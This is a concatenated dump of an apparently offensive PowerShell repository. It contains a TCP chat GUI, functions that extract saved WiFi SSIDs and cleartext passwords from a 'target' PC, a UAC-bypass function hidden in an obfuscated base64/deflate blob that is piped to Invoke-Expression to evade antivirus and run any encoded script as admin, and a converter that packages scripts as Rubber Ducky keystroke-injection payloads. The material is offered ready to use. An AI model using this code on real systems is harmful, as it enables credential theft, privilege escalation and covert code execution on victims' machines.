Room' 37 | $form.Size = New-Object System.Drawing.Size(600, 450) # Adjusted form size 38 | $form.BackColor = [System.Drawing.Color]::FromArgb(45, 45, 48) 39 | $form.AutoScaleMode = 'Dpi' 40 | 41 | # Create a RichTextBox for displaying messages with dark theme 42 | $richTextBoxDisplay = New-Object System.Windows.Forms.RichTextBox 43 | $richTextBoxDisplay.Location = New-Object System.Drawing.Point(10, 10) 44 | $richTextBoxDisplay.Size = New-Object System.Drawing.Size(460, 300) 45 | $richTextBoxDisplay.Anchor = 'Top,Left,Right,Bottom' 46 | $richTextBoxDisplay.BackColor = [System.Drawing.Color]::FromArgb(30, 30, 30) 47 | $richTextBoxDisplay.ForeColor = [System.Drawing.Color]::WhiteSmoke 48 | $form.Controls.Add($richTextBoxDisplay) 49 | 50 | # Create a textbox for typing messages with dark theme 51 | $textBoxInput = New-Object System.Windows.Forms.TextBox 52 | $textBoxInput.Location = New-Object System.Drawing.Point(10, 320) 53 | $textBoxInput.Size = New-Object System.Drawing.Size(360, 20) 54 | $textBoxInput.Anchor = 'Bottom,Left,Right' 55 | $textBoxInput.BackColor = [System.Drawing.Color]::FromArgb(30, 30, 30) 56 | $textBoxInput.ForeColor = [System.Drawing.Color]::WhiteSmoke 57 | $form.Controls.Add($textBoxInput) 58 | 59 | # Create a button for sending messages with dark theme 60 | $buttonSend = New-Object System.Windows.Forms.Button 61 | $buttonSend.Location = New-Object System.Drawing.Point(380, 320) 62 | $buttonSend.Size = New-Object System.Drawing.Size(90, 20) 63 | $buttonSend.Anchor = 'Bottom,Right' 64 | $buttonSend.Text = 'Send' 65 | $buttonSend.BackColor = [System.Drawing.Color]::FromArgb(70, 70, 70) 66 | $buttonSend.ForeColor = [System.Drawing.Color]::WhiteSmoke 67 | $form.Controls.Add($buttonSend) 68 | 69 | # Create textboxes for target IP and Port with labels and anchor them 70 | $labelIP = New-Object System.Windows.Forms.Label 71 | $labelIP.Location = New-Object System.Drawing.Point(10, 350) 72 | $labelIP.Size = New-Object System.Drawing.Size(100, 20) 73 | $labelIP.Text = "Target IP:" 74 | $labelIP.ForeColor = [System.Drawing.Color]::White 75 | $labelIP.Anchor = 'Bottom,Left' # Anchor to bottom left 76 | $form.Controls.Add($labelIP) 77 | 78 | $textBoxIP = New-Object System.Windows.Forms.TextBox 79 | $textBoxIP.Location = New-Object System.Drawing.Point(120, 350) 80 | $textBoxIP.Size = New-Object System.Drawing.Size(150, 20) 81 | $textBoxIP.BackColor = [System.Drawing.Color]::FromArgb(30, 30, 30) 82 | $textBoxIP.ForeColor = [System.Drawing.Color]::WhiteSmoke 83 | $textBoxIP.Anchor = 'Bottom,Left' # Anchor to bottom left 84 | $form.Controls.Add($textBoxIP) 85 | 86 | $labelPort = New-Object System.Windows.Forms.Label 87 | $labelPort.Location = New-Object System.Drawing.Point(10, 380) 88 | $labelPort.Size = New-Object System.Drawing.Size(100, 20) 89 | $labelPort.Text = "Target Port:" 90 | $labelPort.ForeColor = [System.Drawing.Color]::White 91 | $labelPort.Anchor = 'Bottom,Left' # Anchor to bottom left 92 | $form.Controls.Add($labelPort) 93 | 94 | $textBoxPort = New-Object System.Windows.Forms.TextBox 95 | $textBoxPort.Location = New-Object System.Drawing.Point(120, 380) 96 | $textBoxPort.Size = New-Object System.Drawing.Size(150, 20) 97 | $textBoxPort.BackColor = [System.Drawing.Color]::FromArgb(30, 30, 30) 98 | $textBoxPort.ForeColor = [System.Drawing.Color]::WhiteSmoke 99 | $textBoxPort.Anchor = 'Bottom,Left' # Anchor to bottom left 100 | $form.Controls.Add($textBoxPort) 101 | 102 | 103 | # Modify the Send button's click event 104 | $buttonSend.Add_Click({ 105 | $message = $textBoxInput.Text 106 | $targetIP = $textBoxIP.Text 107 | $targetPort = $textBoxPort.Text 108 | 109 | if ($message -ne "" -and $targetIP -ne "" -and $targetPort -ne "") { 110 | Send-TcpMessage -TargetIP $targetIP -TargetPort $targetPort -Message $message 111 | $richTextBoxDisplay.AppendText("You: $message`r`n") 112 | $textBoxInput.Clear() 113 | $richTextBoxDisplay.ScrollToCaret() 114 | } else { 115 | [System.Windows.Forms.MessageBox]::Show("Please fill all fields", "Error", [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Error) 116 | } 117 | }) 118 | 119 | # Create a StatusStrip for the bottom of the form 120 | $statusStrip = New-Object System.Windows.Forms.StatusStrip 121 | $statusStrip.BackColor = [System.Drawing.Color]::FromArgb(70, 70, 70) 122 | $statusLabel1 = New-Object System.Windows.Forms.ToolStripStatusLabel 123 | $statusLabel1.Text = "Status: " 124 | $statusLabel1.ForeColor = [System.Drawing.Color]::White 125 | $statusLabel2 = New-Object System.Windows.Forms.ToolStripStatusLabel 126 | $statusLabel2.Text = "Disconnected" # Default status 127 | $statusLabel2.ForeColor = [System.Drawing.Color]::Red 128 | $statusStrip.Items.Add($statusLabel1) 129 | $statusStrip.Items.Add($statusLabel2) 130 | $form.Controls.Add($statusStrip) 131 | 132 | # Show the form 133 | $form.ShowDialog() 134 | ``` 135 | -------------------------------------------------------------------------------- /Functions/Wifi-Info.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # Wifi-Info 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | These functions will help you enumerate your targets wifi, and the wifi nearby 27 | 28 | ## The Function 29 | 30 | ### [Nearby Networks] 31 | 32 | This quick snippet will get you the wifi connections visible from your targets PC 33 | 34 | ``` 35 | $NearbyNetworks = (netsh wlan show networks mode=Bssid | ?{$_ -like "SSID*" -or $_ -like "*Authentication*" -or $_ -like "*Encryption*"}).trim() 36 | ``` 37 | 38 | ### [Get-CurrentNetwork] 39 | 40 | This first function will get you the SSID and Password the target PC is currently connected to and save it to the variable $CurrentNetwork 41 | 42 | ``` 43 | function Get-CurrentNetwork { 44 | 45 | $pro = netsh wlan show interface | Select-String -Pattern ' SSID '; $pro = [string]$pro;$pos = $pro.IndexOf(':');$pro = $pro.Substring($pos+2).Trim() 46 | 47 | $pass = netsh wlan show profile $pro key=clear | Select-String -Pattern 'Key Content'; $pass = [string]$pass;$passPOS = $pass.IndexOf(':');$pass = $pass.Substring($passPOS+2).Trim() 48 | 49 | return "$pro : $pass" 50 | 51 | } 52 | 53 | $CurrentNetwork = Get-CurrentNetwork 54 | 55 | ``` 56 | 57 | ### [Get-AllNetworks] 58 | 59 | This function will get you a list of all the wifi networks your target has joined and their passwords and save it to the variable $Networks 60 | 61 | ``` 62 | Function Get-Networks { 63 | # Get Network Interfaces 64 | $Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress 65 | 66 | # Get Wifi SSIDs and Passwords 67 | $WLANProfileNames =@() 68 | 69 | #Get all the WLAN profile names 70 | $Output = netsh.exe wlan show profiles | Select-String -pattern " : " 71 | 72 | #Trim the output to receive only the name 73 | Foreach($WLANProfileName in $Output){ 74 | $WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim() 75 | } 76 | $WLANProfileObjects =@() 77 | 78 | #Bind the WLAN profile names and also the password to a custom object 79 | Foreach($WLANProfileName in $WLANProfileNames){ 80 | 81 | #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user 82 | try{ 83 | $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim() 84 | }Catch{ 85 | $WLANProfilePassword = "The password is not stored in this profile" 86 | } 87 | 88 | #Build the object and add this to an array 89 | $WLANProfileObject = New-Object PSCustomobject 90 | $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName 91 | $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword 92 | $WLANProfileObjects += $WLANProfileObject 93 | Remove-Variable WLANProfileObject 94 | } 95 | return $WLANProfileObjects 96 | } 97 | 98 | $Networks = Get-Networks 99 | ``` 100 | 101 |

(back to top)

102 | 103 | 104 | ## Examples 105 | [//]: # (Examples of scripts that have used your function) 106 | Listed below are payloads that have used one of these functions: 107 | 108 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 109 | 110 | [ADV-Recon](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon) 111 | 112 | 113 |

(back to top)

114 | 115 | 116 | ## Contact 117 | 118 |

📱 My Socials 📱

119 |
120 | 121 | 122 | 128 | 134 | 140 | 146 | 147 |
123 | 124 | C# 125 | 126 |
YouTube 127 | 		129 | 130 | Python 131 | 132 |
Twitter 133 | 		135 | 136 | Golang 137 | 138 |
Instagram 139 | 		141 | 142 | Jsonnet 143 | 144 |
Discord 145 |
148 |
149 | 150 | 151 | 152 |

(back to top)

153 | 154 | 155 | ## Acknowledgments 156 | 157 | * [Hak5](https://hak5.org/) 158 | * [UberGuidoZ](https://github.com/UberGuidoZ) 159 | 160 | *** 161 | 162 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 163 | 164 |

(back to top)

165 | -------------------------------------------------------------------------------- /Functions/UAC-Bypass.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Contact
    4. 10 |
  4. Acknowledgments
    5. 11 |
12 |
13 | 14 | # UAC Bypass 15 | 16 |

17 | 18 | C# 19 | 20 |
YouTube Tutorial 21 |

22 | 23 | ## Description 24 | 25 | This is a bonus function I am including with this repository. It will allow you to run any base64 encoded script from a standard Powershell console regardless 26 | if Admin Privledges are required. It will open an Admin prompt and execute your code bypassing the UAC. In order to get this past the Anti Virus I have to heavily 27 | obfuscate it. So with that being said you really should not run code if you do not know what it does so user discretion is advised. 28 | 29 | ## The Function 30 | 31 | ### [UAC-Bypass] 32 | 33 | This function has 2 parts. 34 | 35 | You have the ```$code``` variable you can store any base64 encoded script into. 36 | 37 | You can use my [Text to Base64](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md) function to encode your own scripts. 38 | 39 | ``` 40 | $code = "TgBlAHcALQBJAHQAZQBtACAAQwA6AFwASQB0AC0AVwBvAHIAawBlAGQALgB0AHgAdAA=" 41 | ``` 42 | Next you have a highly obfuscated block of code that will run any Base64 encoded script stored in the ```$code``` variable with Admin rights. 43 | 44 | Using the code above as an example running both of these in a standard non Admin Powershell console will create a file called ```It-Worked.txt``` 45 | 46 | in your C: directory just to show you it works. 47 | 48 | ``` 49 | (nEw-OBJECt Io.CoMpreSsion.DEflateSTrEaM( [SyStem.io.memoRYSTReaM][convErT]::fromBaSE64STriNg( 'hY49C8IwGIT/ykvoGjs4FheLqIgfUHTKEpprK+SLJFL99zYFwUmXm+6ee4rzcbti3o0IcYDWCzxBfKSB+Mldctg98c0TLa1fXsZIHLalonUKxKqAnqRSxHaH+ioa16VRBohaT01EsXCmF03mirOHFa0zRlrFqFRUTM9Udv8QJvKIlO62j6J+hBvCvGYZzfK+c2o68AhZvWqSDIk3GvDEIy1nvIJGwk9J9lH53f22mSdv') ,[SysTEM.io.COMpResSion.coMPRESSIONMoDE]::DeCompress ) | ForeacH{nEw-OBJECt Io.StReaMrEaDer( $_,[SySTEM.teXT.enCOdING]::aSciI )}).rEaDTOEnd( ) | InVoKE-expREssION 50 | ``` 51 | 52 | I have turned this bypass into a function as well. 53 | 54 | Using the following syntax you can run any Base64 encoded script as an Admin: 55 | 56 | ``` 57 | Bypass TgBlAHcALQBJAHQAZQBtACAAQwA6AFwASQB0AC0AVwBvAHIAawBlAGQALgB0AHgAdAA= 58 | ``` 59 | 60 | ``` 61 | function Bypass { 62 | [CmdletBinding()] 63 | param ( 64 | [Parameter (Position=0, Mandatory = $True)] 65 | [string]$code ) 66 | 67 | (nEw-OBJECt Io.CoMpreSsion.DEflateSTrEaM( [SyStem.io.memoRYSTReaM][convErT]::fromBaSE64STriNg( 'hY49C8IwGIT/ykvoGjs4FheLqIgfUHTKEpprK+SLJFL99zYFwUmXm+6ee4rzcbti3o0IcYDWCzxBfKSB+Mldctg98c0TLa1fXsZIHLalonUKxKqAnqRSxHaH+ioa16VRBohaT01EsXCmF03mirOHFa0zRlrFqFRUTM9Udv8QJvKIlO62j6J+hBvCvGYZzfK+c2o68AhZvWqSDIk3GvDEIy1nvIJGwk9J9lH53f22mSdv') ,[SysTEM.io.COMpResSion.coMPRESSIONMoDE]::DeCompress ) | ForeacH{nEw-OBJECt Io.StReaMrEaDer( $_,[SySTEM.teXT.enCOdING]::aSciI )}).rEaDTOEnd( ) | InVoKE-expREssION 68 | } 69 | ``` 70 | 71 | Even though this is a Powershell for Hackers Repository I have it made up and ready to use for python as well. Enjoy 72 | 73 | ``` 74 | import base64 75 | import subprocess 76 | plain_command = "New-Item C:\it-worked.txt" 77 | code = bytearray(plain_command, 'utf-16-le');code = base64.b64encode(code).decode() 78 | setVar = "Set-Variable -Name 'code' -Value "+f'"{code}";' 79 | final_command = r"(nEw-OBJECt Io.CoMpreSsion.DEflateSTrEaM( [SyStem.io.memoRYSTReaM][convErT]::fromBaSE64STriNg( 'hY49C8IwGIT/ykvoGjs4FheLqIgfUHTKEpprK+SLJFL99zYFwUmXm+6ee4rzcbti3o0IcYDWCzxBfKSB+Mldctg98c0TLa1fXsZIHLalonUKxKqAnqRSxHaH+ioa16VRBohaT01EsXCmF03mirOHFa0zRlrFqFRUTM9Udv8QJvKIlO62j6J+hBvCvGYZzfK+c2o68AhZvWqSDIk3GvDEIy1nvIJGwk9J9lH53f22mSdv') ,[SysTEM.io.COMpResSion.coMPRESSIONMoDE]::DeCompress ) | ForeacH{nEw-OBJECt Io.StReaMrEaDer( $_,[SySTEM.teXT.enCOdING]::aSciI )}).rEaDTOEnd( ) | InVoKE-expREssION" 80 | subprocess.run(["powershell",setVar,final_command]) 81 | ``` 82 | 83 |

(back to top)

84 | 85 | 86 | 87 | ## Contact 88 | 89 |

📱 My Socials 📱

90 |
91 | 92 | 93 | 99 | 105 | 111 | 117 | 118 |
94 | 95 | C# 96 | 97 |
YouTube 98 | 		100 | 101 | Python 102 | 103 |
Twitter 104 | 		106 | 107 | Golang 108 | 109 |
Instagram 110 | 		112 | 113 | Jsonnet 114 | 115 |
Discord 116 |
119 |
120 | 121 | 122 |

(back to top)

123 | 124 | 125 | ## Acknowledgments 126 | 127 | * [Hak5](https://hak5.org/) 128 | * [UberGuidoZ](https://github.com/UberGuidoZ) 129 | 130 | *** 131 | 132 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 133 | 134 |

(back to top)

135 | 136 | -------------------------------------------------------------------------------- /VideoNotes/Where-To-Start/quiz.ps1: -------------------------------------------------------------------------------- 1 | function hackerQuiz { 2 | $roles = @{ 3 | 'Bug Bounty Hunter' = 0 4 | 'Malware Analyst' = 0 5 | 'Payload Developer' = 0 6 | 'Penetration Tester' = 0 7 | 'Security Researcher' = 0 8 | 'Cryptographer' = 0 9 | 'Forensic Analyst' = 0 10 | 'Security Auditor' = 0 11 | 'Cyber Security Consultant' = 0 12 | 'Network Security Engineer' = 0 13 | } 14 | 15 | 16 | # Each question adds points to different roles based on the answer 17 | $questions = @( 18 | @{ 19 | 'Question' = "Are you interested in finding and exploiting vulnerabilities in software or web applications?" 20 | 'Scores' = @{ 21 | 'Y' = @('Bug Bounty Hunter', 'Penetration Tester') 22 | } 23 | }, 24 | @{ 25 | 'Question' = "Do you enjoy reverse engineering software or binary files?" 26 | 'Scores' = @{ 27 | 'Y' = @('Malware Analyst', 'Security Researcher') 28 | } 29 | }, 30 | @{ 31 | 'Question' = "Are you interested in developing scripts or tools for offensive security purposes?" 32 | 'Scores' = @{ 33 | 'Y' = @('Payload Developer', 'Penetration Tester') 34 | } 35 | }, 36 | @{ 37 | 'Question' = "Are you intrigued by cryptography and secure communication systems?" 38 | 'Scores' = @{ 39 | 'Y' = @('Cryptographer', 'Security Researcher') 40 | } 41 | }, 42 | @{ 43 | 'Question' = "Do you enjoy analyzing network traffic for suspicious activities?" 44 | 'Scores' = @{ 45 | 'Y' = @('Network Security Engineer', 'Forensic Analyst') 46 | } 47 | }, 48 | @{ 49 | 'Question' = "Do you have an eye for detail and enjoy reviewing code for potential security flaws?" 50 | 'Scores' = @{ 51 | 'Y' = @('Security Auditor', 'Bug Bounty Hunter') 52 | } 53 | }, 54 | @{ 55 | 'Question' = "Do you enjoy identifying, assessing, and managing risk?" 56 | 'Scores' = @{ 57 | 'Y' = @('Security Auditor', 'Cyber Security Consultant') 58 | } 59 | }, 60 | @{ 61 | 'Question' = "Are you interested in providing guidance on how to protect digital infrastructure?" 62 | 'Scores' = @{ 63 | 'Y' = @('Cyber Security Consultant', 'Network Security Engineer') 64 | } 65 | }, 66 | @{ 67 | 'Question' = "Are you fascinated by malicious software and their mechanisms?" 68 | 'Scores' = @{ 69 | 'Y' = @('Malware Analyst', 'Forensic Analyst') 70 | } 71 | }, 72 | @{ 73 | 'Question' = "Do you like the idea of trying to break into systems legally to find vulnerabilities?" 74 | 'Scores' = @{ 75 | 'Y' = @('Penetration Tester', 'Bug Bounty Hunter') 76 | } 77 | }, 78 | @{ 79 | 'Question' = "Are you drawn to the idea of developing defensive mechanisms against cyber attacks?" 80 | 'Scores' = @{ 81 | 'Y' = @('Network Security Engineer', 'Security Architect') 82 | } 83 | }, 84 | @{ 85 | 'Question' = "Are you interested in keeping up-to-date with the latest cybersecurity trends and threat landscape?" 86 | 'Scores' = @{ 87 | 'Y' = @('Security Analyst', 'Threat Intelligence Analyst') 88 | } 89 | }, 90 | @{ 91 | 'Question' = "Do you enjoy the legal and ethical aspects of information security?" 92 | 'Scores' = @{ 93 | 'Y' = @('Cybersecurity Lawyer', 'Security Compliance Officer') 94 | } 95 | }, 96 | @{ 97 | 'Question' = "Are you interested in designing and building secure systems?" 98 | 'Scores' = @{ 99 | 'Y' = @('Security Architect', 'Penetration Tester') 100 | } 101 | }, 102 | @{ 103 | 'Question' = "Would you like to help organizations prepare for and respond to security breaches?" 104 | 'Scores' = @{ 105 | 'Y' = @('Incident Responder', 'Forensic Analyst') 106 | } 107 | }, 108 | @{ 109 | 'Question' = "Are you keen on learning about different operating systems and their security features?" 110 | 'Scores' = @{ 111 | 'Y' = @('Security Auditor', 'Penetration Tester') 112 | } 113 | } 114 | ) 115 | 116 | $roles = @{} 117 | Add-Type -AssemblyName System.Windows.Forms 118 | foreach ($question in $questions) { $msgBoxResult = [System.Windows.Forms.MessageBox]::Show($question['Question'], "Question", [System.Windows.Forms.MessageBoxButtons]::YesNo) 119 | cls 120 | if ($msgBoxResult -eq 'Yes') { foreach ($role in $question['Scores']['Y']) { if (!$roles.ContainsKey($role)) { $roles[$role] = 0 } $roles[$role] += 1 } } } 121 | 122 | # Calculate the highest scored role 123 | 124 | $maxScore = 0 125 | $chosenRole = $null 126 | foreach ($role in $roles.Keys) { if ($roles[$role] -gt $maxScore) { $maxScore = $roles[$role] 127 | $chosenRole = $role } } 128 | 129 | # Output the suggested role 130 | 131 | #$chosenRole = "Bug Bounty Hunter" 132 | cls 133 | switch ($chosenRole) { 134 | 'Bug Bounty Hunter' { 135 | Write-Host "As a Bug Bounty Hunter, you'll find vulnerabilities in systems and earn rewards!" 136 | Start-Process https://github.com/I-Am-Jakoby/Youtube_Minus 137 | } 138 | 'Malware Analyst' { 139 | Write-Host "As a Malware Analyst, you'll reverse-engineer malicious software to understand it!" 140 | } 141 | 'Payload Developer' { 142 | Write-Host "As a Payload Developer, you'll craft scripts and tools to exploit vulnerabilities!" 143 | } 144 | 'Penetration Tester' { 145 | Write-Host "As a Penetration Tester, you'll attempt to breach systems to find their weaknesses!" 146 | 147 | } 148 | 'Security Researcher' { 149 | Write-Host "As a Security Researcher, you'll explore new methods and techniques for securing systems!" 150 | } 151 | 'Cryptographer' { 152 | Write-Host "As a Cryptographer, you'll design secure encryption algorithms and systems!" 153 | } 154 | 'Forensic Analyst' { 155 | Write-Host "As a Forensic Analyst, you'll investigate breaches and incidents to discover what happened!" 156 | } 157 | 'Security Auditor' { 158 | Write-Host "As a Security Auditor, you'll inspect systems to ensure they comply with security standards!" 159 | } 160 | 'Cyber Security Consultant' { 161 | Write-Host "As a Cyber Security Consultant, you'll provide guidance to organizations on how to secure their digital infrastructure!" 162 | } 163 | 'Network Security Engineer' { 164 | Write-Host "As a Network Security Engineer, you'll design and maintain secure networks!" 165 | } 166 | default { 167 | Write-Host "That's not a recognized role in this context." 168 | } 169 | } 170 | 171 | } 172 | 173 | hackerQuiz 174 | # v.2 175 | -------------------------------------------------------------------------------- /Assets/Scripts/P-2-Ducky.ps1: -------------------------------------------------------------------------------- 1 | ############################################################################################################################################################ 2 | # | ___ _ _ _ # ,d88b.d88b # 3 | # Title : Ducky-Base64-Exec | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # 4 | # Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # 5 | # Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # 6 | # Category : Execute | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # 7 | # Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ # 8 | # | |\__/,| (`\ # / -\ /- ~\ # 9 | # | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # 10 | # | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # 11 | # | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # 12 | #__________________________________|_________________________________________________________________________# | | ) ~ ( # 13 | # # / \ / ~ \ # 14 | # github.com/I-Am-Jakoby # \ / \~ ~/ # 15 | # twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# 16 | # instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# 17 | # youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# 18 | ############################################################################################################################################################ 19 | 20 | <# 21 | .SYNOPSIS 22 | This is a powershell cmdlet that will convert a script to Base64 then format it into ducky script ready payload 23 | 24 | .DESCRIPTION 25 | This is a cmdlet that takes a file path and converts the contents of that file to a Base64 string 26 | That Base64 string is then formatted into ducky script ready to be used with the OMG devices or rubber ducky 27 | The output of that conversion will be saved to the desktop by default 28 | Estimated time to execute script is calculate and provided at the top of the output file 29 | The name of the file will be "converted.txt" by default 30 | 31 | 32 | .PARAMETER Source 33 | (Mandatory = $True) 34 | Provide the exact path to the file to be converted 35 | 36 | .PARAMETER Path 37 | (Mandatory = $False) 38 | Provide the exact path to where the output file will be saved 39 | 40 | .PARAMETER File 41 | (Mandatory = $False) 42 | Provide the name of the file 43 | 44 | .PARAMETER Delay 45 | (Mandatory = $False) 46 | Provide a custom delay between commands 47 | .PARAMETER Title 48 | (Mandatory = $False) 49 | Provide the name of the payload 50 | .PARAMETER Author 51 | (Mandatory = $False) 52 | Provide the name of the author 53 | .PARAMETER Description 54 | (Mandatory = $False) 55 | Provide a brief description 56 | 57 | .EXAMPLE 58 | PS-2-Ducky -source "C:\Users\USER\Desktop\script.ps1" -Path "C:\Users\User\Desktop" -File example -Title Super-Payload -Author Jakoby -Description "Does cool stuff" 59 | PS-2-Ducky -s "C:\Users\USER\Desktop\script.ps1" -p "C:\Users\User\Desktop" -f example -t Super-Payload -a Jakoby -d "Does cool stuff" 60 | "C:\Users\USER\Desktop\script.ps1" | PS-2-Ducky -f example -p "C:\Users\User\Desktop" -f example -t Super-Payload -a Jakoby -d "Does cool stuff" 61 | 62 | #> 63 | 64 | function PS-2-Ducky { 65 | [CmdletBinding()] 66 | param ( 67 | 68 | [Parameter (Mandatory = $True, ValueFromPipeline = $True)] 69 | [Alias("s")] 70 | [string]$Source, 71 | 72 | [Parameter (Mandatory = $False)] 73 | [Alias("p")] 74 | [string]$Path, 75 | 76 | [Parameter (Mandatory = $False)] 77 | [Alias("f")] 78 | [string]$File, 79 | 80 | [Parameter (Mandatory = $False)] 81 | [Alias("de")] 82 | [string]$Delay, 83 | 84 | [Parameter (Mandatory = $False)] 85 | [Alias("t")] 86 | [string]$Title, 87 | 88 | [Parameter (Mandatory = $False)] 89 | [Alias("a")] 90 | [string]$Author, 91 | 92 | [Parameter (Mandatory = $False)] 93 | [Alias("d")] 94 | [string]$Description 95 | 96 | ) 97 | 98 | if (!$File) { $File = "converted" } 99 | 100 | if (!$Path) { $Path = [Environment]::GetFolderPath("Desktop") } 101 | 102 | if (!$Delay) { $Delay = 250 } 103 | 104 | $FilePath = ($Path+"\"+$File+".txt") 105 | 106 | $converted = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes((Get-Content -Path $Source -Raw -Encoding UTF8))) 107 | 108 | $numChar = $converted.length 109 | $Time = $numChar/140 110 | $estTime = [math]::Round($Time,2) 111 | 112 | function splitLines{ 113 | While ($converted) 114 | { 115 | $x,$converted = ([char[]]$converted).where({$_},'Split',$incriment) 116 | $x -join '' 117 | } 118 | } 119 | 120 | $lSplit = splitLines 121 | 122 | echo "REM --> $numChar Characters: Estimated $estTime seconds to execute `n" >> $FilePath 123 | 124 | if ($Title) { echo "REM Title: $Title" >> $FilePath} 125 | if ($Author) { echo "REM Author: $Author" >> $FilePath} 126 | if ($Description) { echo "REM Description: $Description" >> $FilePath} 127 | 128 | echo "" >> $FilePath 129 | echo "GUI r" >> $FilePath 130 | echo "DELAY $Delay" >> $FilePath 131 | echo "STRING powershell" >> $FilePath 132 | echo "DELAY $Delay" >> $FilePath 133 | echo "ENTER" >> $FilePath 134 | echo "DELAY $Delay" >> $FilePath 135 | echo "STRING powershell -enc " >> $FilePath 136 | echo "DELAY $Delay" >> $FilePath 137 | 138 | echo "STRING $converted" >> $FilePath 139 | 140 | echo "DELAY $Delay" >> $FilePath 141 | echo "ENTER" >> $FilePath 142 | } 143 | --------------------------------------------------------------------------------